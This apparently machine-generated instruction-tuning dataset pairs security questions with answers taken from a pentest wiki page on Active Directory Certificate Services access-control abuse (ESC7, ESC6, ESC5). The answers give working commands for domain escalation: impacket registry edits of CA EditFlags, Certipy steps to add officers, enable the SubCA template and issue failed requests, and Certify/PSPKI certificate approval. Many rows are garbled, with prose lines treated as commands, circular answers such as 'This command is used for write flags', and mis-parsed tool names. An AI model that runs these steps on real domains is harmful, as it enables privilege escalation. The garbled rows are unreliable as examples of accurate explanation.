"content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, fla... | You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax. | Explain the practical steps for query flags | reg.py "$DOMAIN"/"$USER":"$PASSWORD"@$"ADCS_IP" query -keyName 'HKLM\SYSTEM\CurrentControlSet\Services\CertSvc\Configuration\CA-NAME\PolicyModules\CertificateAuthority_MicrosoftDefault.Policy' -v editflags | {
"corpus_index": 18,
"category": "web",
"source_file": "docs/src/ad/movement/adcs/access-controls.md",
"page_title": "Access controls",
"augmentation_kind": "none",
"row_kind": "technique_howto"
} |
[
{
"role": "system",
"content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."
},
{
"role": "user",
"content": "What is write flags?... | You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved. | What is write flags? | reg.py "$DOMAIN"/"$USER":"$PASSWORD"@$"ADCS_IP" add-keyName 'HKLM\SYSTEM\CurrentControlSet\Services\CertSvc\Configuration\CA-NAME\PolicyModules\CertificateAuthority_MicrosoftDefault.Policy' -v editflags -vd NEW_VALUE
``
=== Windows
From Windows systems, the Certify (C#) tool can be used to enumerate info about the CA... | {
"corpus_index": 19,
"category": "web",
"source_file": "docs/src/ad/movement/adcs/access-controls.md",
"page_title": "Access controls",
"augmentation_kind": "none",
"row_kind": "concept_explain"
} |
[
{
"role": "system",
"content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, fla... | You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax. | Walk me through write flags | reg.py "$DOMAIN"/"$USER":"$PASSWORD"@$"ADCS_IP" add-keyName 'HKLM\SYSTEM\CurrentControlSet\Services\CertSvc\Configuration\CA-NAME\PolicyModules\CertificateAuthority_MicrosoftDefault.Policy' -v editflags -vd NEW_VALUE
``
=== Windows
From Windows systems, the Certify (C#) tool can be used to enumerate info about the CA... | {
"corpus_index": 19,
"category": "web",
"source_file": "docs/src/ad/movement/adcs/access-controls.md",
"page_title": "Access controls",
"augmentation_kind": "none",
"row_kind": "technique_howto"
} |
[
{
"role": "system",
"content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, fla... | You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax. | Give me a guide on write flags | === Windows
From Windows systems, the [Certify](https://github.com/GhostPack/Certify) (C#) tool can be used to enumerate info about the CAs, including access rights over the CA object.
Then, [PSPKI](https://github.com/PKISolutions/PSPKI) (PowerShell) can be used to modify the CA object ([RSAT](https://docs.microsoft.... | {
"corpus_index": 20,
"category": "web",
"source_file": "docs/src/ad/movement/adcs/access-controls.md",
"page_title": "Access controls",
"augmentation_kind": "none",
"row_kind": "attack_command"
} |
[
{
"role": "system",
"content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."
},
{
"role": "user",
"content": "What does this comma... | You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved. | What does this command do: `=== Windows`? | This command is used for write flags. write flags | {
"corpus_index": 20,
"category": "web",
"source_file": "docs/src/ad/movement/adcs/access-controls.md",
"page_title": "Access controls",
"augmentation_kind": "none",
"row_kind": "cmd_explain"
} |
[
{
"role": "system",
"content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."
},
{
"role": "user",
"content": "What is Get the curr... | You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved. | What is Get the current value of EDITF_ATTRIBUTESUBJECTALTNAME2 and modify it with SetConfigEntry? | $configReader = New-Object SysadminsLV.PKI.Dcom.Implementations.CertSrvRegManagerD "CA.domain.local"
$configReader.SetRootNode($true)
$configReader.GetConfigEntry("EditFlags", "PolicyModules\CertificateAuthority_MicrosoftDefault.Policy")
$configReader.SetConfigEntry(1376590, "EditFlags", "PolicyModules\CertificateAutho... | {
"corpus_index": 21,
"category": "web",
"source_file": "docs/src/ad/movement/adcs/access-controls.md",
"page_title": "Access controls",
"augmentation_kind": "none",
"row_kind": "concept_explain"
} |
[
{
"role": "system",
"content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, fla... | You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax. | Explain the practical steps for Get the current value of EDITF_ATTRIBUTESUBJECTALTNAME2 and modify it with SetConfigEntry | $configReader = New-Object SysadminsLV.PKI.Dcom.Implementations.CertSrvRegManagerD "CA.domain.local"
$configReader.SetRootNode($true)
$configReader.GetConfigEntry("EditFlags", "PolicyModules\CertificateAuthority_MicrosoftDefault.Policy")
$configReader.SetConfigEntry(1376590, "EditFlags", "PolicyModules\CertificateAutho... | {
"corpus_index": 21,
"category": "web",
"source_file": "docs/src/ad/movement/adcs/access-controls.md",
"page_title": "Access controls",
"augmentation_kind": "none",
"row_kind": "technique_howto"
} |
[
{
"role": "system",
"content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."
},
{
"role": "user",
"content": "Give me an overview ... | You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved. | Give me an overview of Check after setting the flag (EDITF_ATTRIBUTESUBJECTALTNAME2 should appear in the output) | certutil.exe -config "CA.domain.local\CA" -getreg "policy\EditFlags"
``
If RSAT is not present, it can installed like this:
`powershell
DISM.exe /Online /Get-Capabilities
DISM.exe /Online /add-capability /CapabilityName:Rsat.CertificateServices.Tools~~~~0.0.1.0
``
::: | {
"corpus_index": 22,
"category": "web",
"source_file": "docs/src/ad/movement/adcs/access-controls.md",
"page_title": "Access controls",
"augmentation_kind": "none",
"row_kind": "concept_explain"
} |
[
{
"role": "system",
"content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, fla... | You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax. | Explain the practical steps for Check after setting the flag (EDITF_ATTRIBUTESUBJECTALTNAME2 should appear in the output) | certutil.exe -config "CA.domain.local\CA" -getreg "policy\EditFlags"
``
If RSAT is not present, it can installed like this:
`powershell
DISM.exe /Online /Get-Capabilities
DISM.exe /Online /add-capability /CapabilityName:Rsat.CertificateServices.Tools~~~~0.0.1.0
``
::: | {
"corpus_index": 22,
"category": "web",
"source_file": "docs/src/ad/movement/adcs/access-controls.md",
"page_title": "Access controls",
"augmentation_kind": "none",
"row_kind": "technique_howto"
} |
[
{
"role": "system",
"content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."
},
{
"role": "user",
"content": "What is the If syntax for... | You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps. | What is the If syntax for check after setting the flag (editf_attributesubjectaltname2 should appear in the output)? | If RSAT is not present, it can installed like this: | {
"corpus_index": 23,
"category": "web",
"source_file": "docs/src/ad/movement/adcs/access-controls.md",
"page_title": "Access controls",
"augmentation_kind": "none",
"row_kind": "tool_command",
"tool": "If"
} |
[
{
"role": "system",
"content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, fla... | You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax. | How do I perform Check after setting the flag (EDITF_ATTRIBUTESUBJECTALTNAME2 should appear in the output)? | If RSAT is not present, it can installed like this: | {
"corpus_index": 23,
"category": "web",
"source_file": "docs/src/ad/movement/adcs/access-controls.md",
"page_title": "Access controls",
"augmentation_kind": "none",
"row_kind": "attack_command"
} |
[
{
"role": "system",
"content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."
},
{
"role": "user",
"content": "What does this comma... | You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved. | What does this command do: `If RSAT is not present, it can installed like this:`? | This command is used for check after setting the flag (editf_attributesubjectaltname2 should appear in the output). Check after setting the flag (EDITF_ATTRIBUTESUBJECTALTNAME2 should appear in the output) | {
"corpus_index": 23,
"category": "web",
"source_file": "docs/src/ad/movement/adcs/access-controls.md",
"page_title": "Access controls",
"augmentation_kind": "none",
"row_kind": "cmd_explain"
} |
[
{
"role": "system",
"content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."
},
{
"role": "user",
"content": "Describe Access cont... | You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved. | Describe Access controls - ESC7 - Abusing SubCA in the context of penetration testing | When it is not possible to restart the CertSvc service to enable the EDITF_ATTRIBUTESUBJECTALTNAME2 attribute, the SubCA built-in template can be used, along with a ManageCA right.
The SubCA template is vulnerable to the ESC1 attack, but only Domain Admins and Enterprise Admins can enroll in it. If a standard user tri... | {
"corpus_index": 24,
"category": "web",
"source_file": "docs/src/ad/movement/adcs/access-controls.md",
"page_title": "Access controls",
"augmentation_kind": "none",
"row_kind": "concept_explain"
} |
[
{
"role": "system",
"content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, fla... | You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax. | How would I carry out Access controls - ESC7 - Abusing SubCA during a pentest? | When it is not possible to restart the CertSvc service to enable the EDITF_ATTRIBUTESUBJECTALTNAME2 attribute, the SubCA built-in template can be used, along with a ManageCA right.
The SubCA template is vulnerable to the ESC1 attack, but only Domain Admins and Enterprise Admins can enroll in it. If a standard user tri... | {
"corpus_index": 24,
"category": "web",
"source_file": "docs/src/ad/movement/adcs/access-controls.md",
"page_title": "Access controls",
"augmentation_kind": "none",
"row_kind": "technique_howto"
} |
[
{
"role": "system",
"content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."
},
{
"role": "user",
"content": "What should I know a... | You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved. | What should I know about Add a new officier? | certipy ca -u "$USER@$DOMAIN" -p "$PASSWORD" -dc-ip "$DC_IP" -ca 'ca_name' -add-officer 'user' | {
"corpus_index": 25,
"category": "web",
"source_file": "docs/src/ad/movement/adcs/access-controls.md",
"page_title": "Access controls",
"augmentation_kind": "none",
"row_kind": "concept_explain"
} |
[
{
"role": "system",
"content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, fla... | You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax. | Walk me through Add a new officier | certipy ca -u "$USER@$DOMAIN" -p "$PASSWORD" -dc-ip "$DC_IP" -ca 'ca_name' -add-officer 'user' | {
"corpus_index": 25,
"category": "web",
"source_file": "docs/src/ad/movement/adcs/access-controls.md",
"page_title": "Access controls",
"augmentation_kind": "none",
"row_kind": "technique_howto"
} |
[
{
"role": "system",
"content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."
},
{
"role": "user",
"content": "Tell me about List a... | You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved. | Tell me about List all the templates | certipy ca -u "$USER@$DOMAIN" -p "$PASSWORD" -dc-ip "$DC_IP" -ca 'ca_name' -list-templates | {
"corpus_index": 26,
"category": "web",
"source_file": "docs/src/ad/movement/adcs/access-controls.md",
"page_title": "Access controls",
"augmentation_kind": "none",
"row_kind": "concept_explain"
} |
[
{
"role": "system",
"content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, fla... | You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax. | Walk me through List all the templates | certipy ca -u "$USER@$DOMAIN" -p "$PASSWORD" -dc-ip "$DC_IP" -ca 'ca_name' -list-templates | {
"corpus_index": 26,
"category": "web",
"source_file": "docs/src/ad/movement/adcs/access-controls.md",
"page_title": "Access controls",
"augmentation_kind": "none",
"row_kind": "technique_howto"
} |
[
{
"role": "system",
"content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."
},
{
"role": "user",
"content": "What should I know a... | You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved. | What should I know about Enable a certificate template? | certipy ca -u "$USER@$DOMAIN" -p "$PASSWORD" -dc-ip "$DC_IP" -ca 'ca_name' -enable-template 'SubCA'
``
In order to abuse the SubCA template with ESC7, both ManageCA and ManageCertificates are needed in order to issue a certificate from a failed request.
``bash | {
"corpus_index": 27,
"category": "web",
"source_file": "docs/src/ad/movement/adcs/access-controls.md",
"page_title": "Access controls",
"augmentation_kind": "none",
"row_kind": "concept_explain"
} |
[
{
"role": "system",
"content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, fla... | You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax. | Show me how to do Enable a certificate template | certipy ca -u "$USER@$DOMAIN" -p "$PASSWORD" -dc-ip "$DC_IP" -ca 'ca_name' -enable-template 'SubCA'
``
In order to abuse the SubCA template with ESC7, both ManageCA and ManageCertificates are needed in order to issue a certificate from a failed request.
``bash | {
"corpus_index": 27,
"category": "web",
"source_file": "docs/src/ad/movement/adcs/access-controls.md",
"page_title": "Access controls",
"augmentation_kind": "none",
"row_kind": "technique_howto"
} |
[
{
"role": "system",
"content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."
},
{
"role": "user",
"content": "What is the In syntax for... | You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps. | What is the In syntax for enable a certificate template? | In order to abuse the `SubCA` template with ESC7, both `ManageCA` and `ManageCertificates` are needed in order to issue a certificate from a failed request. | {
"corpus_index": 28,
"category": "web",
"source_file": "docs/src/ad/movement/adcs/access-controls.md",
"page_title": "Access controls",
"augmentation_kind": "none",
"row_kind": "tool_command",
"tool": "In"
} |
[
{
"role": "system",
"content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, fla... | You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax. | How to execute Enable a certificate template? | In order to abuse the `SubCA` template with ESC7, both `ManageCA` and `ManageCertificates` are needed in order to issue a certificate from a failed request. | {
"corpus_index": 28,
"category": "web",
"source_file": "docs/src/ad/movement/adcs/access-controls.md",
"page_title": "Access controls",
"augmentation_kind": "none",
"row_kind": "attack_command"
} |
[
{
"role": "system",
"content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."
},
{
"role": "user",
"content": "What does this comma... | You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved. | What does this command do: `In order to abuse the `SubCA` template with ESC7, both `ManageCA` and `ManageCertificates` are needed in order to issue a certificate from a failed request.`? | This command is used for enable a certificate template. Enable a certificate template | {
"corpus_index": 28,
"category": "web",
"source_file": "docs/src/ad/movement/adcs/access-controls.md",
"page_title": "Access controls",
"augmentation_kind": "none",
"row_kind": "cmd_explain"
} |
[
{
"role": "system",
"content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."
},
{
"role": "user",
"content": "Describe Issue a fai... | You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved. | Describe Issue a failed request (need ManageCA and ManageCertificates rights for a failed request) in the context of penetration testing | certipy ca -u "$USER@$DOMAIN" -p "$PASSWORD" -dc-ip "$DC_IP" -target "$ADCS_HOST" -ca 'ca_name' -issue-request 100 | {
"corpus_index": 29,
"category": "web",
"source_file": "docs/src/ad/movement/adcs/access-controls.md",
"page_title": "Access controls",
"augmentation_kind": "none",
"row_kind": "concept_explain"
} |
[
{
"role": "system",
"content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, fla... | You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax. | Walk me through Issue a failed request (need ManageCA and ManageCertificates rights for a failed request) | certipy ca -u "$USER@$DOMAIN" -p "$PASSWORD" -dc-ip "$DC_IP" -target "$ADCS_HOST" -ca 'ca_name' -issue-request 100 | {
"corpus_index": 29,
"category": "web",
"source_file": "docs/src/ad/movement/adcs/access-controls.md",
"page_title": "Access controls",
"augmentation_kind": "none",
"row_kind": "technique_howto"
} |
[
{
"role": "system",
"content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."
},
{
"role": "user",
"content": "What is Retrieve an ... | You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved. | What is Retrieve an issued certificate? | certipy req -u "$USER@$DOMAIN" -p "$PASSWORD" -dc-ip "$DC_IP" -target "$ADCS_HOST" -ca 'ca_name' -retrieve 100
``
The certificate can then be used with Pass-The-Certificate to obtain a TGT and authenticate.
=== Windows
From Windows systems, the Certify (C#) tool can be used to enumerate info about the CAs, including... | {
"corpus_index": 30,
"category": "web",
"source_file": "docs/src/ad/movement/adcs/access-controls.md",
"page_title": "Access controls",
"augmentation_kind": "none",
"row_kind": "concept_explain"
} |
[
{
"role": "system",
"content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, fla... | You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax. | How to execute Retrieve an issued certificate? | certipy req -u "$USER@$DOMAIN" -p "$PASSWORD" -dc-ip "$DC_IP" -target "$ADCS_HOST" -ca 'ca_name' -retrieve 100
``
The certificate can then be used with Pass-The-Certificate to obtain a TGT and authenticate.
=== Windows
From Windows systems, the Certify (C#) tool can be used to enumerate info about the CAs, including... | {
"corpus_index": 30,
"category": "web",
"source_file": "docs/src/ad/movement/adcs/access-controls.md",
"page_title": "Access controls",
"augmentation_kind": "none",
"row_kind": "technique_howto"
} |
[
{
"role": "system",
"content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."
},
{
"role": "user",
"content": "What is the The syntax fo... | You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps. | What is the The syntax for retrieve an issued certificate? | The certificate can then be used with [Pass-The-Certificate](../kerberos/pass-the-certificate.md) to obtain a TGT and authenticate.
=== Windows
From Windows systems, the [Certify](https://github.com/GhostPack/Certify) (C#) tool can be used to enumerate info about the CAs, including access rights over the CA object, ... | {
"corpus_index": 31,
"category": "web",
"source_file": "docs/src/ad/movement/adcs/access-controls.md",
"page_title": "Access controls",
"augmentation_kind": "none",
"row_kind": "tool_command",
"tool": "The"
} |
[
{
"role": "system",
"content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, fla... | You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax. | Walk me through Retrieve an issued certificate | The certificate can then be used with [Pass-The-Certificate](../kerberos/pass-the-certificate.md) to obtain a TGT and authenticate.
=== Windows
From Windows systems, the [Certify](https://github.com/GhostPack/Certify) (C#) tool can be used to enumerate info about the CAs, including access rights over the CA object, ... | {
"corpus_index": 31,
"category": "web",
"source_file": "docs/src/ad/movement/adcs/access-controls.md",
"page_title": "Access controls",
"augmentation_kind": "none",
"row_kind": "attack_command"
} |
[
{
"role": "system",
"content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."
},
{
"role": "user",
"content": "What does this comma... | You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved. | What does this command do: `The certificate can then be used with [Pass-The-Certificate](../kerberos/pass-the-certificate.md) to obtain a TGT and authenticate.`? | This command is used for retrieve an issued certificate. Retrieve an issued certificate | {
"corpus_index": 31,
"category": "web",
"source_file": "docs/src/ad/movement/adcs/access-controls.md",
"page_title": "Access controls",
"augmentation_kind": "none",
"row_kind": "cmd_explain"
} |
[
{
"role": "system",
"content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."
},
{
"role": "user",
"content": "Give me an overview ... | You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved. | Give me an overview of 1. Request a certificate that requires manager approval with Certify | Certify.exe request /ca:CA.domain.local\CA /template:ApprovalNeeded
...
[*] Request ID : 1 | {
"corpus_index": 32,
"category": "web",
"source_file": "docs/src/ad/movement/adcs/access-controls.md",
"page_title": "Access controls",
"augmentation_kind": "none",
"row_kind": "concept_explain"
} |
[
{
"role": "system",
"content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, fla... | You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax. | How to execute 1. Request a certificate that requires manager approval with Certify? | Certify.exe request /ca:CA.domain.local\CA /template:ApprovalNeeded
...
[*] Request ID : 1 | {
"corpus_index": 32,
"category": "web",
"source_file": "docs/src/ad/movement/adcs/access-controls.md",
"page_title": "Access controls",
"augmentation_kind": "none",
"row_kind": "technique_howto"
} |
[
{
"role": "system",
"content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."
},
{
"role": "user",
"content": "Give me an overview ... | You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved. | Give me an overview of 3. Approve the pending request with PSPKI | PSPKI > Get-CertificationAuthority -ComputerName CA.domain.local | Get-PendingRequest -RequestID 1 | Approve-CertificateRequest | {
"corpus_index": 33,
"category": "web",
"source_file": "docs/src/ad/movement/adcs/access-controls.md",
"page_title": "Access controls",
"augmentation_kind": "none",
"row_kind": "concept_explain"
} |
[
{
"role": "system",
"content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, fla... | You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax. | Walk me through 3. Approve the pending request with PSPKI | PSPKI > Get-CertificationAuthority -ComputerName CA.domain.local | Get-PendingRequest -RequestID 1 | Approve-CertificateRequest | {
"corpus_index": 33,
"category": "web",
"source_file": "docs/src/ad/movement/adcs/access-controls.md",
"page_title": "Access controls",
"augmentation_kind": "none",
"row_kind": "technique_howto"
} |
[
{
"role": "system",
"content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."
},
{
"role": "user",
"content": "Tell me about 4. Dow... | You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved. | Tell me about 4. Download the certificate with Certify | Certify.exe download /ca:CA.domain.local\CA /id:1
```
:::
> [!WARNING]
>
> If sensitive rights are identified, creativity will be the best ally. Not much public tooling is available at the time of writing (October 21st, 2021).
>
> Currently, the best resources for manually abusing this are
>
> * the whitepaper (PD... | {
"corpus_index": 34,
"category": "web",
"source_file": "docs/src/ad/movement/adcs/access-controls.md",
"page_title": "Access controls",
"augmentation_kind": "none",
"row_kind": "concept_explain"
} |
[
{
"role": "system",
"content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, fla... | You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax. | Show me how to do 4. Download the certificate with Certify | Certify.exe download /ca:CA.domain.local\CA /id:1
```
:::
> [!WARNING]
>
> If sensitive rights are identified, creativity will be the best ally. Not much public tooling is available at the time of writing (October 21st, 2021).
>
> Currently, the best resources for manually abusing this are
>
> * the whitepaper (PD... | {
"corpus_index": 34,
"category": "web",
"source_file": "docs/src/ad/movement/adcs/access-controls.md",
"page_title": "Access controls",
"augmentation_kind": "none",
"row_kind": "technique_howto"
} |
[
{
"role": "system",
"content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."
},
{
"role": "user",
"content": "Tell me about Access... | You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved. | Tell me about Access controls - Other objects (ESC5) | This can be enumerated and abused like regular AD access control abuses. Once control over an AD-CS-related is gained, creativity will be the attacker's best ally.
> [!TIP]
> Read the DACL abuse article for more insight. | {
"corpus_index": 35,
"category": "web",
"source_file": "docs/src/ad/movement/adcs/access-controls.md",
"page_title": "Access controls",
"augmentation_kind": "none",
"row_kind": "concept_explain"
} |
[
{
"role": "system",
"content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, fla... | You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax. | Explain the practical steps for Access controls - Other objects (ESC5) | This can be enumerated and abused like regular AD access control abuses. Once control over an AD-CS-related is gained, creativity will be the attacker's best ally.
> [!TIP]
> Read the DACL abuse article for more insight. | {
"corpus_index": 35,
"category": "web",
"source_file": "docs/src/ad/movement/adcs/access-controls.md",
"page_title": "Access controls",
"augmentation_kind": "none",
"row_kind": "technique_howto"
} |
[
{
"role": "system",
"content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."
},
{
"role": "user",
"content": "Explain Certificate ... | You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved. | Explain Certificate authority - Certificate Authority misconfiguration | In their research papers, Will Schroeder and Lee Christensen found a domain escalation vector based on a dangerous CA setting (i.e. the EDITF_ATTRIBUTESUBJECTALTNAME2 flag). The escalation vector was dubbed ESC6.
